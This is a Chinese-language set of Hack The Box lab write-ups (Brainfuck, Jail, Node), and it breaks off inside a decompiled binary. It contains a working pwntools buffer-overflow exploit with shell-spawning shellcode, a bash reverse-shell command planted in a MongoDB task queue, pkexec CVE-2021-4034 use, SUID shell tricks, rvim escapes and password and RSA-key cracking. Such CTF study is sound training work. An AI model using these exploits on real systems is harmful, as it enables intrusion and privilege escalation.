Hackbox | Kaia

Brainfuck

Fri, 05 Aug 2022 14:51:40 +0800

nmap

nmap -A -p- 10.10.10.17

Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-05 02:47 EDT
Nmap scan report for 10.10.10.17
Host is up (0.091s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER RESP-CODES CAPA TOP PIPELINING UIDL AUTH-RESP-CODE
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 IDLE AUTH=PLAINA0001 LITERAL+ ID more Pre-login have post-login capabilities LOGIN-REFERRALS OK listed ENABLE SASL-IR
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.0 (Ubuntu)
| tls-nextprotoneg:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 73.51 ms 10.10.16.1
2 143.86 ms 10.10.10.17

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.77 seconds

Jail

Thu, 04 Aug 2022 21:02:40 +0800

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 22:27 EDT
Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 48.94% done; ETC: 22:32 (0:02:04 remaining)
Stats: 0:05:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 83.33% done; ETC: 22:34 (0:00:16 remaining)
Nmap scan report for 10.10.10.34
Host is up (0.12s latency).
Not shown: 65257 filtered tcp ports (no-response), 272 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:ec:19:7c:da:dc:16:e2:a3:9d:42:f3:18:4b:e6:4d (RSA)
| 256 af:94:9f:2f:21:d0:e0:1d:ae:8e:7f:1d:7b:d7:42:ef (ECDSA)
|_ 256 6b:f8:dc:27:4f:1c:89:67:a4:67:c5:ed:07:53:af:97 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 39526/tcp6 nlockmgr
| 100021 1,3,4 42846/udp6 nlockmgr
| 100021 1,3,4 46781/tcp nlockmgr
| 100021 1,3,4 49806/udp nlockmgr
| 100024 1 33052/udp status
| 100024 1 34561/tcp status
| 100024 1 49568/tcp6 status
| 100024 1 56922/udp6 status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
7411/tcp open daqstream?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ OK Ready. Send USER command.
20048/tcp open mountd 1-3 (RPC #100005)

发现以下端口信息：

22端口 ssh OpenSSH 6.6.1

80端口 http Apache httpd 2.4.6 ((CentOS))

111端口 rpcbind

2049 nfs_acl

7411 未知服务

20048 mountd nfs挂载守护进程

访问80端口，返回一个有意思的图片，没什么信息。

扫描web路径

feroxbuster -u http://10.10.10.34 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

发现目录 http://10.10.10.34/jailuser，

compile.sh

gcc -o jail jail.c -m32 -z execstack
service jail stop
cp jail /usr/local/bin/jail
service jail start

但是-z execstack 禁用了数据区执行保护 (DEP)，也就是说如果jail.c的逻辑存在溢出问题，可以执行恶意指令。

那目标明确，接下来重点分析jail的源代码

jail.c

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>
#include <time.h>

int debugmode;
int handle(int sock);
int auth(char *username, char *password);

int auth(char *username, char *password) {
 char userpass[16];
 char *response;
 if (debugmode == 1) {
 printf("Debug: userpass buffer @ %p\n", userpass);
 fflush(stdout);
 }
 if (strcmp(username, "admin") != 0) return 0;
 strcpy(userpass, password);
 if (strcmp(userpass, "1974jailbreak!") == 0) {
 return 1;
 } else {
 printf("Incorrect username and/or password.\n");
 return 0;
 }
 return 0;
}

int handle(int sock) {
 int n;
 int gotuser = 0;
 int gotpass = 0;
 char buffer[1024];
 char strchr[2] = "\n\x00";
 char *token;
 char username[256];
 char password[256];
 debugmode = 0;
 memset(buffer, 0, 256);
 dup2(sock, STDOUT_FILENO);
 dup2(sock, STDERR_FILENO);
 printf("OK Ready. Send USER command.\n");
 fflush(stdout);
 while(1) {
 n = read(sock, buffer, 1024);
 if (n < 0) {
 perror("ERROR reading from socket");
 return 0;
 }
 token = strtok(buffer, strchr);
 while (token != NULL) {
 if (gotuser == 1 && gotpass == 1) {
 break;
 }
 if (strncmp(token, "USER ", 5) == 0) {
 strncpy(username, token+5, sizeof(username));
 gotuser=1;
 if (gotpass == 0) {
 printf("OK Send PASS command.\n");
 fflush(stdout);
 }
 } else if (strncmp(token, "PASS ", 5) == 0) {
 strncpy(password, token+5, sizeof(password));
 gotpass=1;
 if (gotuser == 0) {
 printf("OK Send USER command.\n");
 fflush(stdout);
 }
 } else if (strncmp(token, "DEBUG", 5) == 0) {
 if (debugmode == 0) {
 debugmode = 1;
 printf("OK DEBUG mode on.\n");
 fflush(stdout);
 } else if (debugmode == 1) {
 debugmode = 0;
 printf("OK DEBUG mode off.\n");
 fflush(stdout);
 }
 }
 token = strtok(NULL, strchr);
 }
 if (gotuser == 1 && gotpass == 1) {
 break;
 }
 }
 if (auth(username, password)) {
 printf("OK Authentication success. Send command.\n");
 fflush(stdout);
 n = read(sock, buffer, 1024);
 if (n < 0) {
 perror("Socket read error");
 return 0;
 }
 if (strncmp(buffer, "OPEN", 4) == 0) {
 printf("OK Jail doors opened.");
 fflush(stdout);
 } else if (strncmp(buffer, "CLOSE", 5) == 0) {
 printf("OK Jail doors closed.");
 fflush(stdout);
 } else {
 printf("ERR Invalid command.\n");
 fflush(stdout);
 return 1;
 }
 } else {
 printf("ERR Authentication failed.\n");
 fflush(stdout);
 return 0;
 }
 return 0;
}

int main(int argc, char *argv[]) {
 int sockfd;
 int newsockfd;
 int port;
 int clientlen;
 char buffer[256];
 struct sockaddr_in server_addr;
 struct sockaddr_in client_addr;
 int n;
 int pid;
 int sockyes;
 sockyes = 1;
 sockfd = socket(AF_INET, SOCK_STREAM, 0);
 if (sockfd < 0) {
 perror("Socket error");
 exit(1);
 }
 if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sockyes, sizeof(int)) == -1) {
 perror("Setsockopt error");
 exit(1);
 }
 memset((char*)&server_addr, 0, sizeof(server_addr));
 port = 7411;
 server_addr.sin_family = AF_INET;
 server_addr.sin_addr.s_addr = INADDR_ANY;
 server_addr.sin_port = htons(port);
 if (bind(sockfd, (struct sockaddr*)&server_addr, sizeof(server_addr)) < 0) {
 perror("Bind error");
 exit(1);
 }
 listen(sockfd, 200);
 clientlen = sizeof(client_addr);
 while (1) {
 newsockfd = accept(sockfd, (struct sockaddr*)&client_addr, &clientlen);
 if (newsockfd < 0) {
 perror("Accept error");
 exit(1);
 }
 pid = fork();
 if (pid < 0) {
 perror("Fork error");
 exit(1);
 }
 if (pid == 0) {
 close(sockfd);
 exit(handle(newsockfd));
 } else {
 close(newsockfd);
 }
 }
}

代码分析：

建立了一个套接字，AF_INET(ipv4),SOCK_STREAM(tcp连接)，等会用nc作为客户端交互就行

监听端口7411，fork子进程调用handle()，实现功能的代码都在handle()，结合nmap发现打开了7411端口，应该就是这个程序jail

分析handle()有以下几种交互，

DEBUG 调试模式

#auth认证函数，硬编码，这里其实验证密码正确了，也没有什么后续的逻辑操作
#char username[256];
#char password[256];
USER admin 验证用户名
PASS 1974jailbreak! 验证密码

#这两个功能只是打印字符串，什么也不做
OPEN 打开监狱
CLOSE 关闭监狱

进入DEBUG调试模式

当先执行DEBUG模式，再进行密码认证的时候。会打印密码userpass的内存地址

打印了userpass的缓冲区地址

通过重复执行，发现userpass 缓冲区地址是静态的

漏洞的关键点

代码第21行strcpy() 将password[256]的值复制到userpass[16] ，导致userpass可以造成缓冲区溢出，

结合compile.sh脚本禁用了DEP，并且userpass的地址是静态的，可以尝试写入shellcode 执行命令

IDA调试

计算偏移量，strcpy()处下断点，

50个字符串已经崩溃

FFFFCAC0-FFFFCAA0=20,十进制就是32字节，要留4个字节写return到shellcode(),所以偏移量是28字节。

构造exp

#插入字符由：填充字符+ret地址+结束符+shellcode组成

#填充字符到ESP，28个字符，python -c 'print("A"*28)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
#16进制userpass的内存地址+结束符（0xffffcaa0+ \x00）
\xc0\xca\xff\xff

#shellcode
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6
\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80
\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6
\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x31\xc9\xcd\x80";

在auth() return处下个断点，

调试跟进发现shellcode已经被转换成汇编代码执行，这段汇编代码实现Linux/x86 - execve(/bin/sh)

https://www.exploit-db.com/exploits/34060

执行完这段汇编代码即可返回sh shell

python实现脚本 exp.py

#!/usr/bin/env python3

from pwn import *

userpass_addr= int(b'0xffffd610',16) #这个地址要先通过DEBUG获取

if args['REMOTE']:
 ip = '10.10.10.34'
else:
 ip = '127.0.0.1'

# Get Leaked Address
shellcode = b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
shellcode += b"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
shellcode += b"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
shellcode += b"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += b"\x89\xe3\x31\xc9\xcd\x80";

payload = b"A"*28
payload += p32(userpass_addr + 32 )
payload += shellcode

p = remote(ip, 7411)
p.recvuntil(b"OK Ready. Send USER command.")
p.sendline(b"USER admin")
p.recvuntil(b"OK Send PASS command.")
p.sendline(b"PASS " + payload)

p.interactive()

=====================================================

到这里分析结束，回到题目

获取nobody shell

先获取userpass_addr地址

执行

pkexec提权一步到位(非预期解)

============================================================

本来想curl传脚本过去，但是好像超时了，不给访问网络，不知道是有策略还是什么原因

所以直接写

https://github.com/dadvlingd/-CVE-2021-4034

cat CVE-2021-4034-py2.py |base64

echo '{编码后的内容}' >/tmp/pk_base64

cat /tmp/pk_base64|base64 -d >/tmp/pk.py

============================================================

正常提权

SELinux

一种嵌入linux内核的安全机制，目的是为了限制对文件和网络的策略访问，刚才curl超时可能和这个有关。

$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0

#context的意思是当前是system权限，并且没有限制什么服务，意思是我可以做任何事情（这里指的是SELinux策略没有限制nobody这个用户）

https://baike.baidu.com/item/SELinux/8865268?fr=aladdin

nobody提权到frank

sudo -l

nobody 可以执行/opt/logreader/logreader.sh，但是没权限看(后面回来看了也没什么信息)

根据nmap扫描出来的结果，2049端口是nfs服务

showmount -e 列出远程主机上的NFS共享目录

挂载之后发现什么也读不到，权限不够。并且nfsshare的权限组居然变成kali，

使用前面拿到的nobody shell看一下nfs的配置文件/etc/exports

$ cat /etc/exports
/var/nfsshare *(rw,sync,root_squash,no_all_squash)
/opt *(rw,sync,root_squash,no_all_squash)

通过查看文档得知，NFS在提供服务时有一个用户映射的机制在里面，配置参数如下：

all_squash：所有访问用户都映射为匿名用户或用户组；
no_all_squash（默认）：访问用户先与本机用户匹配，匹配失败后再映射为匿名用户或用户组；

通过nobody shell 发现frank 用户组是1000，本地用户和靶机frank匹配失败，所以被映射为1000用户组，然后我本地kali的gid=1000所以前面看到远程挂载的用户组是kali

所以只要本地伪造一个用户frank，权限也设置为frank❌1000:1000:frank，这个账户就有权限访问 /var/nfsshare ，/opt

伪造frank用户访问nfs

我kali本地uid=1000，要先将/etc/passwd, /etc/group 里kali的编号1000都改为1001，然后本地创建frank

#-u 指定uid
useradd frank -u 1000

==========================================================

后面测试发现nfs只匹配uid和gid，用户名不是frank也行，kali本身uid=1000的话就不用创建个新的账号这么麻烦了

==========================================================

重新挂载/var/nfsshare

mkdir -p /mnt/nfsshare
chmod 777 /mnt/nfsshare #不加的话frank没权限

#-o tcp 不加的话很卡
mount -t nfs -o tcp 10.10.10.34:/var/nfsshare/ /mnt/nfsshare/

现在用户组识别为frank

nfs挂载服务无法直接执行bash shell远程弹回来, 但是可以将编译好的bash shell程序通过nfs服务上传到远程服务器，然后再添加suid，再通过靶机上nobody 执行上传的bash shell

因为设置了suid位的进程在执行的时候，拥有的权限是进程本身的属主权限，而不是执行的发起者

，在执行过程中，调用者会暂时获得该文件的所有者权限

意思就是uid_1000_sh 的文件所有者是frank ，当uid_1000_sh设置了suid位，用nobody 去执行uid_1000_sh 的时候，uid_1000_sh 会以frank 权限被执行，这样就可以导致提权。

frank@kali:/tmp$ cat uid_1000_bash.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
 setresuid(1000, 1000, 1000);
 system("/bin/bash");
 return 0;
}

frank@kali:/tmp$ gcc -m32 uid_1000_bash.c -o /mnt/nfsshare/uid_1000_bash
frank@kali:/tmp$ chmod 7777 /mnt/nfsshare/uid_1000_bash

nobody 上执行后成功提权到frank

script /dev/null

/var/nfsshare/uid_1000_bash

这个shell不稳定，写个公钥用ssh连接

[frank@localhost .ssh]$ $ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRKFfz2jS4mH1HmJMOhxCg0B/BbBLc4iDMYeR6wG1BKUeospV8EBwNnBDH+Qvg47XBBxhkjZGZToEELQ8ZFBeg7r75pSBkwxAaVG/sC9T8TEwqdr6a/G935eZXBFSzmuhV3sTlcKfMgb4tM5xdgNqRWcoCo3dwiYfya/6Bs6/1TEAmqWotGRjObhgcy95z8uObRmlvimEcLpdhUTJt10+2w63givJlP7OBOsFI4H4N4gMsh1NYQwyR2oUGYyc3suqkqnjDyzQ+7ezoje2sQr1Bg7AQqsI8YTh8ePElSTBEXc2/0WouqhwJ5jKMQP2jzGPF2RmKg9XghoIVQGdUBdh7998ABKyHdjJdWxk3ekNZoxnXp9tBlgVd2OQ8jUHW/sHi0anUwKY4ZhZ6SbJtOPJIm967oR5gLAUjPzVVYMHGSYajy1sJNXAYa9L/ro9F75O7H1cxZuWk7c6wUvJORB3tKovLr9gzKpshTXMDwIna9QzZcTkPBuNzpKVUJ2MHrGc= root@kali' >> /home/frank/.ssh/authorized_keys

ssh -i /root/.ssh/id_rsa frank@10.10.10.34

frank提权到adm

sudo -l

frank可以以adm身份运行rvim，rvim是vim的一种

https://linux.die.net/man/1/rvim

命令写死了，参数无法注入

sudo -u adm /usr/bin/rvim /var/www/html/jailuser/dev/jail.c

执行后进入文本编辑模式，常规vim可以在末行模式下输入:![command] 执行命令

但是rvim禁止执行shell命令

但是有绕过的方式

https://gtfobins.github.io/

末行模式下输入：

#方法一
:py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")

#方法二
:python import pty; pty.spawn("/bin/bash")

确认后即可获得adm shell

adm提权到root

adm没有运行任何进程，只能查找和adm有关的文件

find / -group adm 2>/dev/null | grep -v -e ^/proc

排除下来只有三个文件

/var/adm/.keys/note.txt
/var/adm/.keys/.local/.frank
/var/adm/.keys/keys.rar

下面的扯淡的社工解密时间

==========================================================

note.txt

Note from Administrator:
Frank, for the last time, your password for anything encrypted must be your last name followed by a 4 digit number and a symbol.

#翻译
来自管理员的注释：
弗兰克，最后一次，您的任何加密密码都必须是您的姓氏，后跟一个 4 位数字和一个符号。

.frank

Szszsz! Mlylwb droo tfvhh nb mvd kzhhdliw! Lmob z uvd ofxpb hlfoh szev Vhxzkvw uiln Zoxzgiza zorev orpv R wrw!!!

#这个纯经验，没见过这个加密方式就解不了
解密网站：https://www.quipqiup.com/
解密结果：
Hahaha! Nobody will guess my new password! Only a few lucky souls have Escaped from Alcatraz alive like I did!!!

关键信息：alcatraz

keys.rar是压缩包(可以base64传出来解压看)

└─# file keys.rar
keys.rar: RAR archive data, v4, os: Unix

打开可以看到是root的公钥文件，但是需要密码

结合note.txt和.frank ，给出的信息和密码有关

密码是：Frank的姓氏+4位数字+1个符号

Frank(弗兰克)的姓氏结合alcatraz(恶魔岛)和题目名jail可以社工到这个人Frank Morris

https://en.wikipedia.org/wiki/June_1962_Alcatraz_escape_attempt

越狱事件是1962年，所以得到一个接近的密码

Morris1962 + 1个符号

还差一个符号，可以爆破了

使用工具archpr，掩码是Morris1962?

得到密码Morris1962!

解压得到rootauthorizedsshkey.pub

恢复root公钥

RsaCtfTool这个工具可以将弱公钥恢复成私钥

https://github.com/RsaCtfTool/RsaCtfTool

安装这个工具的依赖


git clone https://github.com/RsaCtfTool/RsaCtfTool
#mpfr
wget https://www.mpfr.org/mpfr-current/mpfr-4.1.0.tar.bz2
tar -jxvf mpfr-4.1.0.tar.bz2 && cd mpfr-4.1.0
./configure
make && make check && make install
#mpc
wget ftp://ftp.gnu.org/gnu/mpc/mpc-1.1.0.tar.gz
tar -zxvf mpc-1.1.0.tar.gz && cd mpc-1.1.0
./configure
make && make check && make install

cd RsaCtfTool
python3 -m pip install -r requirements.txt

执行

python3 ./RsaCtfTool/RsaCtfTool.py --publickey rootauthorizedsshkey.pub --private

得到root私钥，保存位jail-root

设置权限

chmod 600 ./jail-root

获得root权限

Node

Mon, 25 Jul 2022 15:35:40 +0800

nmap端口识别

nmap -A 10.10.10.58

3000端口

在http://10.10.10.58:3000/api/users/latest 发现了哈希密码

请求响应头X-Powered-By: Express 知道是nodejs框架

这里有个不太懂的特性，记录一下

==============================================================

请求头If-None-Match的值需要修改才能查看到返回包，不然直接返回HTTP/1.1 304 Not Modified

不知道是不是nodejs特性

If-None-Match定义

https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/If-None-Match

==============================================================

回到题目，哈希在线解密

https://crackstation.net/

得到两个web密码

tom/spongebob
mark/snowflake

显示只有admin有面板权限

这里面什么都没有，后来通过访问一个用户信息的链接

http://10.10.10.58:3000/api/users/mark

返回了用户的个人账号信息

当你回退一级目录，发现存在用户的信息遍历

http://10.10.10.58:3000/api/users/

发现了一个新的用户，并且是管理员

得到web账号密码

myP14ceAdm1nAcc0uNT/manchester

可以下载备份文件

# file myplace.backup 
myplace.backup: ASCII text, with very long lines (65536), with no line terminators

查看文本发现是base64

解码后发现是zip压缩包

┌──(root㉿kali)-[/home/kali/hackbox/Node]
└─# cat myplace.backup|base64 -d>myplace.backup.decode

┌──(root㉿kali)-[/home/kali/hackbox/Node]
└─# file myplace.backup.decode
myplace.backup.decode: Zip archive data, at least v1.0 to extract, compression method=store

解压需要密码

┌──(root㉿kali)-[/home/kali/hackbox/Node]
└─# unzip myplace.backup.zip
Archive: myplace.backup.zip
 creating: var/www/myplace/
[myplace.backup.zip] var/www/myplace/package-lock.json password:

fcrackzip工具枚举得到密码

┌──(root㉿kali)-[/home/kali/hackbox/Node]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u ./myplace.backup.zip


PASSWORD FOUND!!!!: pw == magicword

通过app.js发现了 mark ssh登录密码`5AYRft73VtFpc84k`

mongodb标准 URI 连接语法：

mongodb://[username:password@]host1[:port1][,host2[:port2],...[,hostN[:portN]]][/[database][?options]]

ssh mark

polkit提权一步到位：

===============================================================

简单一点直接polkit提权 CVE-2021-4034 到root

https://github.com/dadvlingd/-CVE-2021-4034

===============================================================

常规提权：

因为mark没权限读flag，所以要先提权到tom，再提权到root才能拿到

提权到tom

ps -auxww

只有两个进程是tom运行的

/usr/bin/node /var/www/myplace/app.js
/usr/bin/node /var/scheduler/app.js

/var/scheduler/app.js

const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
 if (error || !db) {
 console.log('[!] Failed to connect to mongodb');
 return;
 }

 setInterval(function () {
 db.collection('tasks').find().toArray(function (error, docs) {
 if (!error && docs) {
 docs.forEach(function (doc) {
 if (doc) {
 console.log('Executing task ' + doc._id + '...');
 exec(doc.cmd);
 db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
 }
 });
 }
 else if (error) {
 console.log('Something went wrong: ' + error);
 }
 });
 }, 30000);

});

该脚本连接mongo的scheduler数据库，每30秒执行一次。

代码解读：

1.从tasks集合(类似sql中的表)中取出字符，
2.将每个字符传递给exec()执行命令,然后删除这个字符
3.30秒后再循环执行。

那么只要修改mongo数据库对应的文档(字段)为exp，然后tom用户自动执行/var/scheduler/app.js去读取mongo被修改的文档，执行命令反弹tom shell即可提权成功

执行过程如下：

mark@node:/home/tom$ mongo -u mark -p 5AYRft73VtFpc84k scheduler

show collections

db.tasks.find()

db.tasks.insert({"cmd": "bash -c 'bash -i >& /dev/tcp/10.10.16.14/2333 0>&1'"})

30秒后监听的端口收到shell，成功提权到tom

提权到root

看了下group组，发现root居然属于admin组

/etc/group字段解析

https://blog.51cto.com/dlican/3741615

发现只有/usr/local/bin/backup文件属于admin组

/usr/local/bin/backup是32位二进制可执行文件

tom@node:/$ file /usr/local/bin/backup
/usr/local/bin/backup: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped

通过查找运行的nodejs代码，发现/var/www/myplace/app.js调用了/usr/local/bin/backup

find / -name '*.js' 2>/dev/null|xargs grep '/usr/local/bin/backup'

通过/var/www/myplace/app.js得知/usr/local/bin/backup需要传入三位参数，

/usr/local/bin/backup -q backup_key, __dirname

继续分析，通过IDA反编译/usr/local/bin/backup得到代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
 __uid_t v3; // eax
 __pid_t v4; // esi
 time_t v5; // ebx
 clock_t v6; // eax
 unsigned int v7; // eax
 char command[1500]; // [esp+1h] [ebp-10B1h] BYREF
 char name[1000]; // [esp+5DDh] [ebp-AD5h] BYREF
 char v11[500]; // [esp+9C5h] [ebp-6EDh] BYREF
 char s[1000]; // [esp+BB9h] [ebp-4F9h] BYREF
 char filename[100]; // [esp+FA1h] [ebp-111h] BYREF
 char v14[6]; // [esp+1005h] [ebp-ADh] BYREF
 char v15[3]; // [esp+100Bh] [ebp-A7h] BYREF
 _BYTE v16[6]; // [esp+100Eh] [ebp-A4h] BYREF
 char v17[6]; // [esp+1014h] [ebp-9Eh] BYREF
 char v18[6]; // [esp+101Ah] [ebp-98h] BYREF
 char src[2]; // [esp+1020h] [ebp-92h] BYREF
 char dest[100]; // [esp+1022h] [ebp-90h] BYREF
 int v21; // [esp+1086h] [ebp-2Ch]
 FILE *stream; // [esp+108Ah] [ebp-28h]
 int i; // [esp+108Eh] [ebp-24h]
 int v24; // [esp+1092h] [ebp-20h]
 int v25; // [esp+1096h] [ebp-1Ch]
 int *p_argc; // [esp+10A2h] [ebp-10h]

 p_argc = &argc;
 v3 = geteuid();
 setuid(v3);
 v25 = 0;
 v24 = 0;
 if ( argc <= 3 )
 exit(1);
 if ( strcmp(argv[1], "-q") )
 {
 v24 = 1;
 puts("\n\n\n ____________________________________________________");
 puts(" / \\");
 puts(" | _____________________________________________ |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | Secure Backup v1.0 | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | | | |");
 puts(" | |_____________________________________________| |");
 puts(" | |");
 puts(" \\_____________________________________________________/");
 puts(" \\_______________________________________/");
 puts(" _______________________________________________");
 puts(" _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_");
 puts(" _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_");
 puts(" _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_");
 puts(" _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_");
 puts(" _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_");
 puts(":-----------------------------------------------------------------------------:");
 puts("`---._.-----------------------------------------------------------------._.---'\n\n");
 }
 strncpy(dest, argv[2], 0x64u);
 strcpy(src, "/");
 strcpy(v14, "/e");
 strcpy(&v14[3], "tc");
 strcpy(v15, src);
 *(_WORD *)&v15[strlen(v15)] = 109;
 strcpy(v16, "yp");
 strcpy(&v16[3], "la");
 strcpy(v17, "ce");
 strcpy(&v17[3], src);
 *(_WORD *)&v17[strlen(&v17[3]) + 3] = 107;
 strcpy(v18, "ey");
 strcpy(&v18[3], "s");
 strcpy(filename, v14);
 for ( i = 1; i <= 8; ++i )
 strcat(filename, &v14[3 * i]);
 stream = fopen(filename, "r");
 if ( !stream )
 {
 if ( v24 == 1 )
 displayWarning("Could not open file\n\n");
 exit(1);
 }
 while ( fgets(s, 1000, stream) )
 {
 s[strcspn(s, "\n")] = 0;
 if ( !strcmp(dest, s) )
 {
 v25 = 1;
 if ( v24 == 1 )
 displaySuccess("Validated access token");
 }
 }
 if ( v25 != 1 )
 {
 if ( v24 == 1 )
 displayWarning("Ah-ah-ah! You didn't say the magic word!\n\n");
 exit(1);
 }
 if ( strstr(argv[3], "..") )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
